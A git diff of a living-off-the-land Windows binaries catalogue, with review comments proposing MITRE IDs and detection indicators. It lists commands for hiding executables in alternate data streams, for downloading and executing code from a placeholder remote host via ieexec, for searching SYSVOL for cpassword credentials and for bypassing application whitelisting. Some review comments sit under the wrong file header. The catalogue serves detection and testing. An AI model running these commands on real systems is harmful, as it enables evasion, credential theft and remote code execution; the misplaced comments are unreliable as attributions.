https://twitter.com/egre55/status/985994639202283520 -Notes: Thanks to egre55 - @egre55 - + - Link: https://twitter.com/egre55/status/985994639202283520 +Acknowledgement: + - Person: egre55 + Handle: '@egre55' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Expand.yml b/yml/OSBinaries/Expand.yml index dea7d4b..fc2a4d5 100644 --- a/yml/OSBinaries/Expand.yml +++ b/yml/OSBinaries/Expand.yml 
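Review bot: The last Esentutl.yml command (copying `\\live.sysinternals.com\tools\adrestore.exe` to another UNC path) is tagged `Category: Download` but keeps `MitreID: T1096` and the T1096 MitreLink, which is the ADS technique used by the alternate-data-stream entries; the other Download entries in this patch (Expand.yml, Extrac32.yml) use T1105, so this one should read `MitreID: T1105` and `MitreLink: https://attack.mitre.org/wiki/Technique/T1105`. Two of the ADS entries say `hide it in an alternate data stream as a defensive counter measure`, which reads as if hiding were the defence — `to evade defensive counter measures` matches the wording used in Control.yml and Cscript.yml. The Detection block is left with an empty `IOC:`; the listed commands themselves suggest at least `IOC: Esentutl.exe invoked with /y and a UNC or ADS path argument`. The hunk starts on the previous page line.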
@@ -1,23 +1,46 @@ --- Name: Expand.exe -Description: Download, Copy, Add ADS -Author: '' +Description: Binary that expands one or more compressed files +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: expand \\webdav\folder\file.bat c:\ADS\file.bat - Description: 'Copies source file to destination.' + Description: Copies source file to destination. + Usecase: Use to copies the source file to the destination file + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: expand c:\ADS\file1.bat c:\ADS\file2.bat - Description: 'Copies source file to destination.' + Description: Copies source file to destination. + Usecase: Copies files from A to B + Category: Copy + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat - Description: 'Copies source file to destination Alternate Data Stream (ADS).' 
+ Description: Copies source file to destination Alternate Data Stream (ADS) + Usecase: Copies files from A to B + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\Expand.exe - - c:\windows\sysWOW64\Expand.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\Expand.exe + - Path: C:\Windows\SysWOW64\Expand.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://twitter.com/infosecn1nja/status/986628482858807297 - - https://twitter.com/Oddvarmoe/status/986709068759949319 -Notes: Thanks to Rahmat Nurfauzi - @infosecn1nja, Oddvar Moe - @oddvarmoe - + - Link: https://twitter.com/infosecn1nja/status/986628482858807297 + - Link: https://twitter.com/Oddvarmoe/status/986709068759949319 +Acknowledgement: + - Person: Rahmat Nurfauzi + Handle: '@infosecn1nja' + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml index a858f1e..a35aabc 100644 --- a/yml/OSBinaries/Extexport.yml +++ b/yml/OSBinaries/Extexport.yml 
@@ -1,18 +1,27 @@ --- Name: Extexport.exe -Description: Execute -Author: '' +Description: +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: Extexport.exe c:\test foo bar - Description: 'Load a DLL located in the c:\\test folder with one of the following names: mozcrt19.dll, mozsqlite3.dll, or sqlite.dll' + Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll + Usecase: Execute dll file + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - 'C:\Program Files\Internet Explorer\Extexport.exe ' - - C:\Program Files\Internet Explorer(x86)\Extexport.exe -Code Sample: [] -Detection: [] + - Path: C:\Program Files\Internet Explorer\Extexport.exe + - Path: C:\Program Files\Internet Explorer(x86)\Extexport.exe +Code Sample: +- Code: +Detection: + - IOC: Extexport.exe loads dll and is execute from other folder the original path Resources: - - http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/ -Notes: Thanks to Adam - @hexacorn - + - Link: http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/ +Acknowledgement: + - Person: Adam + Handle: '@hexacorn' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml index 3d8febe..42f8bc9 100644 --- a/yml/OSBinaries/Extrac32.yml +++ b/yml/OSBinaries/Extrac32.yml 
@@ -1,24 +1,47 @@ --- Name: Extrac32.exe -Description: Add ADS, Download -Author: '' +Description: +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe - Description: 'Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.' + Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file. + Usecase: Extract data from cab file and hide it in an alternate data stream. + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe - Description: 'Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.' + Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file. + Usecase: Extract data from cab file and hide it in an alternate data stream. + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt - Description: 'Copy the source file to the destination file and overwrite it.' + Description: Copy the source file to the destination file and overwrite it. 
+ Usecase: Download file from UNC/WEBDav + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\extrac32.exe - - c:\windows\sysWOW64\extrac32.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\extrac32.exe + - Path: C:\Windows\SysWOW64\extrac32.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - - https://twitter.com/egre55/status/985994639202283520 -Notes: Thanks to Oddvar Moe - @oddvarmoe, egre55 - @egre55 - + - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ + - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f + - Link: https://twitter.com/egre55/status/985994639202283520 +Acknowledgement: + - Person: egre55 + Handle: '@egre55' + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Findstr.yml b/yml/OSBinaries/Findstr.yml index 5945a9d..e8731af 100644 --- a/yml/OSBinaries/Findstr.yml +++ b/yml/OSBinaries/Findstr.yml 
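Review bot: The top-level `Description:` is empty and the only `Detection:` entry is a bare `- IOC:` with no value, so the new template fields give a defender nothing to work with in this file. The three commands shown either write to a `file.txt:<stream>` destination or read from a `\\webdavserver` UNC path, which supports two grounded indicators: `- IOC: extrac32.exe writing to a destination path that names an alternate data stream` and `- IOC: extrac32.exe reading its source CAB or file from a UNC/WebDAV path`. In the second command's Description, `unc path` should be `UNC path`.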
@@ -1,23 +1,52 @@ --- Name: Findstr.exe -Description: Add ADS, Search -Author: '' +Description: +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe - Description: 'Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.' + Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. + Usecase: Add a file to an alternate data stream to hide from defensive counter measures + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe - Description: 'Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.' - - Command: findstr /S /I cpassword \\\sysvol\\policies\*.xml - Description: 'Search for stored password in Group Policy files stored on SYSVOL.' + Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. + Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: findstr /S /I cpassword \\sysvol\policies\*.xml + Description: Search for stored password in Group Policy files stored on SYSVOL. 
+ Usecase: Find credentials stored in cpassword attrbute + Category: Credentials + Privileges: User + MitreID: T1081 + MitreLink: https://attack.mitre.org/wiki/Technique/T1081 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe + Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is downloaded to the target file. + Usecase: Download/Copy file from webdav server + Category: Download + Privileges: User + MitreID: T1185 + MitreLink: https://attack.mitre.org/wiki/Technique/T1185 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\findstr.exe - - c:\windows\sysWOW64\findstr.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\findstr.exe + - Path: C:\Windows\SysWOW64\findstr.exe +Code Sample: +- Code: +Detection: + - IOC: finstr.exe should normally not be invoked on a client system Resources: - - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f -Notes: Thanks to Oddvar Moe - @oddvarmoe - + - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ + - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +Acknowledgement: + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml index 25c9393..81dbe0c 100644 --- a/yml/OSBinaries/Forfiles.yml +++ b/yml/OSBinaries/Forfiles.yml 
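Review bot: The new IOC misspells the binary (`finstr.exe`), and the claim that it `should normally not be invoked on a client system` is doubtful because findstr is routinely called from batch and logon scripts; an indicator tied to what the listed commands actually do is more actionable, e.g. `- IOC: findstr.exe redirecting output into an alternate data stream or reading a file from a UNC path`. The fourth command is categorised `Download` but carries `MitreID: T1185` and the matching link, while every other Download entry in this commit (Extrac32, Hh, Ieexec, Makecab) uses `T1105`; this looks like a copy error and should be aligned. The third command's Usecase has a typo: `attrbute` should be `attribute`.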
@@ -1,22 +1,39 @@ --- Name: Forfiles.exe -Description: Execute, Read ADS -Author: '' +Description: Selects and executes a command on a file or set of files. This command is useful for batch processing. +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe - Description: 'Executes calc.exe since there is a match for notepad.exe in the c:\\windows\\System32 folder.' + Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder. + Usecase: Use forfiles to start a new process to evade defensive counter measures + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" - Description: 'Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\\windows\\system32 folder.' + Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. 
+ Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\system32\forfiles.exe - - C:\Windows\sysWOW64\forfiles.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\forfiles.exe + - Path: C:\Windows\SysWOW64\forfiles.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://twitter.com/vector_sec/status/896049052642533376 - - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ -Notes: Thanks to Eric - @vector_sec, Oddvar Moe - @oddvarmoe - + - Link: https://twitter.com/vector_sec/status/896049052642533376 + - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f + - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ +Acknowledgement: + - Person: Eric + Handle: '@vector_sec' + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Gpscript.yml b/yml/OSBinaries/Gpscript.yml index 3b457d9..656a194 100644 --- a/yml/OSBinaries/Gpscript.yml +++ b/yml/OSBinaries/Gpscript.yml 
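Review bot: `Detection:` is left as an empty `- IOC:` placeholder. Both commands launch a child via `/c`, and the second points `/c` at `c:\folder\normal.dll:evil.exe`, so a grounded starting indicator is `- IOC: forfiles.exe spawning a child process, especially one whose image path contains an alternate data stream`. The second Description also still abbreviates `Alternate Data Stream (AD)`; it should be `(ADS)` as in the rest of the file.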
@@ -1,22 +1,36 @@ --- Name: Gpscript.exe -Description: Execute -Author: '' +Description: Used by group policy to process scripts +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: Gpscript /logon - Description: 'Executes logon scripts configured in Group Policy.' + Description: Executes logon scripts configured in Group Policy. + Usecase: Add local group policy logon script to execute file and hide from defensive counter measures + Category: Execute + Privileges: Administrator + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: Gpscript /startup - Description: 'Executes startup scripts configured in Group Policy.' + Description: Executes startup scripts configured in Group Policy + Usecase: Add local group policy logon script to execute file and hide from defensive counter measures + Category: Execute + Privileges: Administrator + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\gpscript.exe - - c:\windows\sysWOW64\gpscript.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\gpscript.exe + - Path: C:\Windows\SysWOW64\gpscript.exe +Code Sample: +- Code: +Detection: + - IOC: Scripts added in local group policy + - IOC: Execution of Gpscript.exe after logon Resources: - - https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ -Notes: | - Thanks to Oddvar Moe - @oddvarmoe - Requires administrative rights and modifications to local group policy settings. - + - Link: https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ +Acknowledgement: + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index 8f58fe0..c107bae 100644 --- a/yml/OSBinaries/Hh.yml 
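Review bot: The second command's `Usecase` was copied from the first: it says `Add local group policy logon script ...` but the command is `Gpscript /startup` and its Description talks about startup scripts, so it should read `Usecase: Add local group policy startup script to execute file and hide from defensive counter measures`. The removed Notes stated that the technique `Requires administrative rights and modifications to local group policy settings`; `Privileges: Administrator` keeps the first half, but the second half is now only implied by the first IOC, so consider restoring it in the top-level Description. Minor: the second Description dropped the trailing period that the first has.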
+++ b/yml/OSBinaries/Hh.yml @@ -1,23 +1,35 @@ --- -Name: hh.exe -Description: Download, Execute -Author: '' +Name: Hh.exe +Description: Binary used for processing chm files in Windows +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: HH.exe http://www.google.com - Description: Opens google's web page with HTML Help. - - Command: HH.exe C:\ - Description: Opens c:\\ with HTML Help. - - Command: HH.exe c:\windows\system32\calc.exe - Description: 'Opens calc.exe with HTML Help.' - Command: HH.exe http://some.url/script.ps1 Description: Open the target PowerShell script with HTML Help. + Usecase: Download files from url + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: HH.exe c:\windows\system32\calc.exe + Description: Executes calc.exe with HTML Help. + Usecase: Execute process with HH.exe + Category: Execute + Privileges: User + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\hh.exe - - c:\windows\sysWOW64\hh.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\hh.exe + - Path: C:\Windows\SysWOW64\hh.exe +Code Sample: +- Code: +Detection: + - IOC: hh.exe should normally not be in use on a normal workstation Resources: - - https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/ -Notes: Thanks to Oddvar Moe - @oddvarmoe + - Link: https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/ +Acknowledgement: + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Ie4unit.yml b/yml/OSBinaries/Ie4unit.yml index f0ca116..925013d 100644 --- a/yml/OSBinaries/Ie4unit.yml +++ b/yml/OSBinaries/Ie4unit.yml 
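Review bot: The `HH.exe c:\windows\system32\calc.exe` entry is categorised `Execute` but tagged `MitreID: T1216` with the matching link, whereas the comparable Execute entries for a signed binary launching another program in this commit (Forfiles, Extexport, Ie4unit, Infdefaultinstall) use `T1218`; unless HH is deliberately treated as a script host, `T1218` is the consistent choice. The IOC `hh.exe should normally not be in use on a normal workstation` conflicts with the new Description, which says the binary is used for processing chm files, so it will fire whenever a user opens a help file; `- IOC: hh.exe launched with a URL or an executable path as its argument instead of a .chm file` is tied to the two commands actually listed.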
@@ -1,20 +1,29 @@ --- Name: Ie4unit.exe -Description: Execute -Author: '' +Description: +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: ie4unit.exe -BaseSettings - Description: 'Executes commands from a specially prepared ie4uinit.inf file.' + Description: Executes commands from a specially prepared ie4uinit.inf file. + Usecase: Get code execution by copy files to another location + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - 'c:\windows\system32\ie4unit.exe ' - - 'c:\windows\sysWOW64\ie4unit.exe ' - - 'c:\windows\system32\ieuinit.inf ' - - 'c:\windows\sysWOW64\ieuinit.inf ' -Code Sample: [] -Detection: [] + - Path: c:\windows\system32\ie4unit.exe + - Path: c:\windows\sysWOW64\ie4unit.exe + - Path: c:\windows\system32\ieuinit.inf + - Path: c:\windows\sysWOW64\ieuinit.inf +Code Sample: +- Code: +Detection: + - IOC: ie4unit.exe loading a inf file from outside %windir% Resources: - - https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ -Notes: Thanks to Jimmy - @bohops - + - Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml index a31f8c5..b3682a0 100644 --- a/yml/OSBinaries/Ieexec.yml +++ b/yml/OSBinaries/Ieexec.yml 
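Review bot: The binary's name appears in three spellings on the new side — `Ie4unit.exe`/`ie4unit.exe` in Name, Command and Path, `ie4uinit.inf` in the command Description, and `ieuinit.inf` in the last two paths; as far as I know the shipped binary is `ie4uinit.exe` (with the extra `i`) and its inf is `ieuinit.inf`, so each name should be verified against the file on disk and made consistent. The `Path:` entries also keep lowercase `c:\windows\system32` where the rest of this commit normalised to `C:\Windows\System32`. The top-level `Description:` is empty, and the two `.inf` entries sit under `Full Path` although they are not the binary; the new IOC already says `ie4unit.exe loading a inf file`, so that is probably where the inf name belongs (and `a inf` should be `an inf`).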
@@ -1,18 +1,35 @@ --- -Name: IEExec.exe -Description: Execute -Author: '' +Name: Ieexec.exe +Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL. +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe - Description: 'Executes bypass.exe from the remote server.' + - Command:ieexec.exe http://x.x.x.x:8080/bypass.exe + Description: Downloads and executes bypass.exe from the remote server. + Usecase: Download and run attacker code from remote location + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command:ieexec.exe http://x.x.x.x:8080/bypass.exe + Description: Downloads and executes bypass.exe from the remote server. + Usecase: Download and run attacker code from remote location + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\ieexec.exe - - c:\windows\sysWOW64\ieexec.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ -Notes: Thanks to Casey Smith - @subtee - + - Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' +--- \ No newline at end of file 
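Review bot: Both new `Command` lines are written `- Command:ieexec.exe http://x.x.x.x:8080/bypass.exe` with no space after the colon; in YAML `Command:ieexec.exe` is a plain scalar rather than a key, so the list item is parsed as a string and the indented `Description:` that follows either fails to parse or is not attached to a command, which breaks any tool consuming these files. Restore the space in both entries: `- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe`. `Detection:` is also an empty `- IOC:`; the Description itself (`Downloads and executes ... from the remote server`) points to `- IOC: ieexec.exe making an outbound HTTP connection` as a grounded starting indicator.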
diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index e1d6e54..86afd15 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml +++ b/yml/OSBinaries/Infdefaultinstall.yml @@ -1,20 +1,28 @@ --- -Name: InfDefaultInstall.exe -Description: Execute -Author: '' +Name: Infdefaultinstall.exe +Description: Binary used to perform installation based on content inside inf files +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: InfDefaultInstall.exe Infdefaultinstall.inf - Description: 'Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.' + Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. + Usecase: Code execution + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\Infdefaultinstall.exe - - c:\windows\sysWOW64\Infdefaultinstall.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\Infdefaultinstall.exe + - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe +Code Sample: +- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a +Detection: + - IOC: Resources: - - https://twitter.com/KyleHanslovan/status/911997635455852544 - - https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a - - https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/ -Notes: Thanks to Kyle Hanslovan - @kylehanslovan - + - Link: https://twitter.com/KyleHanslovan/status/911997635455852544 + - Link: https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/ +Acknowledgement: + - Person: Kyle Hanslovan + Handle: '@kylehanslovan' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index 2f575c3..9a02884 100644 
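Review bot: `Detection:` is a bare `- IOC:` with no value. The command Description names the mechanism — `Executes SCT script using scrobj.dll ... INF file` — so `- IOC: InfDefaultInstall.exe loading scrobj.dll` is a grounded starting indicator (confirm the load is in-process before relying on it). The same Description also carries the slip `from a command in entered into a specially prepared INF file`; on the new side it can read `from a command entered into a specially prepared INF file`.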
--- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml 
@@ -1,25 +1,42 @@ --- -Name: InstallUtil.exe -Description: Execute -Author: '' +Name: Installutil.exe +Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll - Description: 'Execute the target .NET DLL or EXE.' + Description: Execute the target .NET DLL or EXE. + Usecase: Use to execute code and bypass application whitelisting + Category: AWL bypass + Privileges: User + MitreID: T1118 + MitreLink: https://attack.mitre.org/wiki/Technique/T1118 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll + Description: Execute the target .NET DLL or EXE. + Usecase: Use to execute code and bypass application whitelisting + Category: Execute + Privileges: User + MitreID: T1118 + MitreLink: https://attack.mitre.org/wiki/Technique/T1118 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe + - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ - - https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 - - 
http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html - - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md - - https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ - - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ -Notes: Thanks to Casey Smith - @subtee - + - Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ + - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 + - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1118/T1118.md + - Link: https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ + - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ + - Link: https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Makecab.yml b/yml/OSBinaries/Makecab.yml index 210e4eb..5f73075 100644 --- a/yml/OSBinaries/Makecab.yml +++ b/yml/OSBinaries/Makecab.yml 
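Review bot: The two commands are byte-identical and so are their Descriptions and Usecases; only `Category` differs (`AWL bypass` vs `Execute`), so a reader cannot tell what the AWL-bypass entry adds — the first Description could say `Execute the target .NET DLL or EXE via a signed Microsoft binary that application whitelisting rules commonly allow.` `Detection:` is also only an empty `- IOC:`; the command as shown uses `/U` and `/LogToConsole=false` against an arbitrary assembly, so `- IOC: InstallUtil.exe launched with /U against an assembly that is not part of a software installation` is a reasonable starting point, to be refined.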
